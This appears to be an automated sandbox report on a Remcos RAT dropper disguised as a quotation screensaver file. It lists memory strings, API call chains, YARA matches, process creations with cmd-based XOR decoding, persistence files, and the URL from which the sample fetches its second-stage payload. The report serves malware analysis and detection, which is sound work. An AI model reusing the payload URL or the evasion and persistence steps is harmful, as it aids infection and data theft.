                Source: z1Quotation.scr.exe, 00000082.00000003.33541893342.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.0000000007415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/FrKSUMZ203.bin
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/FrKSUMZ203.binAppData
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236810978.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541893342.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/FrKSUMZ203.binI
                Source: z1Quotation.scr.exe, 00000082.00000003.33236810978.0000000007415000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541893342.0000000007415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/FrKSUMZ203.binc
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/FrKSUMZ203.binrasadhlp.dll
                Source: z1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/Jo
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/Tt
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/bo
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/telesavers.co.za
                Source: z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telesavers.co.za/telesavers.co.za5
                Source: z1Quotation.scr.exeString found in binary or memory: https://www.google.com
                Source: z1Quotation.scr.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownHTTPS traffic detected: 102.65.21.26:443 -> 192.168.11.20:49760 version: TLS 1.2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00405620 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405620
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,137_2_0040987A
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,137_2_004098E2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,138_2_00406DFC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,138_2_00406E9F
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,139_2_004068B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,139_2_004072B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_004082FF EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,140_2_004082FF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00408367 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,140_2_00408367
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,146_2_004068B5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,146_2_004072B5
                Source: C:\Windows\SysWOW64\dxdiag.exeWindows user hook set: 0 mouse low level C:\Windows\System32\dinput8.dll

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35121957679.0000000007422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Source: Conhost.exeProcess created: 96

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: z1Quotation.scr.exe
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess Stats: CPU usage > 6%
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00401806 NtdllDefWindowProc_W,137_2_00401806
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004018C0 NtdllDefWindowProc_W,137_2_004018C0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004016FD NtdllDefWindowProc_A,138_2_004016FD
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004017B7 NtdllDefWindowProc_A,138_2_004017B7
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00402CAC NtdllDefWindowProc_A,139_2_00402CAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00402D66 NtdllDefWindowProc_A,139_2_00402D66
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00409ED0 NtQuerySystemInformation,NtQuerySystemInformation,140_2_00409ED0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00409F44 memset,CreateFileW,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,CloseHandle,140_2_00409F44
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00402CAC NtdllDefWindowProc_A,146_2_00402CAC
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00402D66 NtdllDefWindowProc_A,146_2_00402D66
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00406ABA0_2_00406ABA
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_6D431B280_2_6D431B28
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00406E8F137_2_00406E8F
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044B040137_2_0044B040
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0043610D137_2_0043610D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00447310137_2_00447310
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044A490137_2_0044A490
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040755A137_2_0040755A
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0043C560137_2_0043C560
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044B610137_2_0044B610
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044D6C0137_2_0044D6C0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004476F0137_2_004476F0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044B870137_2_0044B870
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044081D137_2_0044081D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00414957137_2_00414957
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004079EE137_2_004079EE
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00407AEB137_2_00407AEB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044AA80137_2_0044AA80
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00412AA9137_2_00412AA9
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00404B74137_2_00404B74
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00404B03137_2_00404B03
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0044BBD8137_2_0044BBD8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00404BE5137_2_00404BE5
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00404C76137_2_00404C76
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00415CFE137_2_00415CFE
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00416D72137_2_00416D72
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00446D30137_2_00446D30
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00446D8B137_2_00446D8B
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00405038138_2_00405038
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0041208C138_2_0041208C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004050A9138_2_004050A9
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0040511A138_2_0040511A
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0043C13A138_2_0043C13A
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004051AB138_2_004051AB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00449300138_2_00449300
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0040D322138_2_0040D322
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044A4F0138_2_0044A4F0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0043A5AB138_2_0043A5AB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00413631138_2_00413631
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00446690138_2_00446690
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044A730138_2_0044A730
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004398D8138_2_004398D8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004498E0138_2_004498E0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0044A886138_2_0044A886
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0043DA09138_2_0043DA09
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00438D5E138_2_00438D5E
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00449ED0138_2_00449ED0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_0041FE83138_2_0041FE83
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_00430F54138_2_00430F54
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004050C2139_2_004050C2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004014AB139_2_004014AB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00405133139_2_00405133
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004051A4139_2_004051A4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00401246139_2_00401246
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_0040CA46139_2_0040CA46
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00405235139_2_00405235
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004032C8139_2_004032C8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_004222D9139_2_004222D9
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00401689139_2_00401689
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00402F60139_2_00402F60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_004079B6140_2_004079B6
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00415063140_2_00415063
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0043F014140_2_0043F014
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0043A3EF140_2_0043A3EF
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00432671140_2_00432671
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0043D76D140_2_0043D76D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_004217C9140_2_004217C9
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_00413ACB140_2_00413ACB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0043BC0D140_2_0043BC0D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 140_2_0043AF50140_2_0043AF50
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004050C2146_2_004050C2
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004014AB146_2_004014AB
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00405133146_2_00405133
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004051A4146_2_004051A4
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00401246146_2_00401246
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_0040CA46146_2_0040CA46
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00405235146_2_00405235
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004032C8146_2_004032C8
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_004222D9146_2_004222D9
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00401689146_2_00401689
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00402F60146_2_00402F60
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413DCE appears 48 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00414060 appears 50 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00414A64 appears 78 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413CE8 appears 58 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00423B2E appears 43 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413D0C appears 36 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413D18 appears 42 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFileName vs z1Quotation.scr.exe
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFilename vs z1Quotation.scr.exe
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFileName vs z1Quotation.scr.exe
                Source: z1Quotation.scr.exeBinary or memory string: OriginalFilename vs z1Quotation.scr.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
                Source: z1Quotation.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@410/33@14/3
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,137_2_004182CE
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 139_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,139_2_00410DE1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 146_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,146_2_00410DE1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004048D0 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004048D0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,137_2_00413D4C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_00402178 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_00402178
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,137_2_0040B58D
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Profilere55Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ZLUOGZ
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1412
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsx806F.tmpJump to behavior
                Source: z1Quotation.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSystem information queried: HandleInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: z1Quotation.scr.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: z1Quotation.scr.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: z1Quotation.scr.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: z1Quotation.scr.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: z1Quotation.scr.exeVirustotal: Detection: 18%
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeFile read: C:\Users\user\Desktop\z1Quotation.scr.exeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_138-33208
                Source: unknownProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
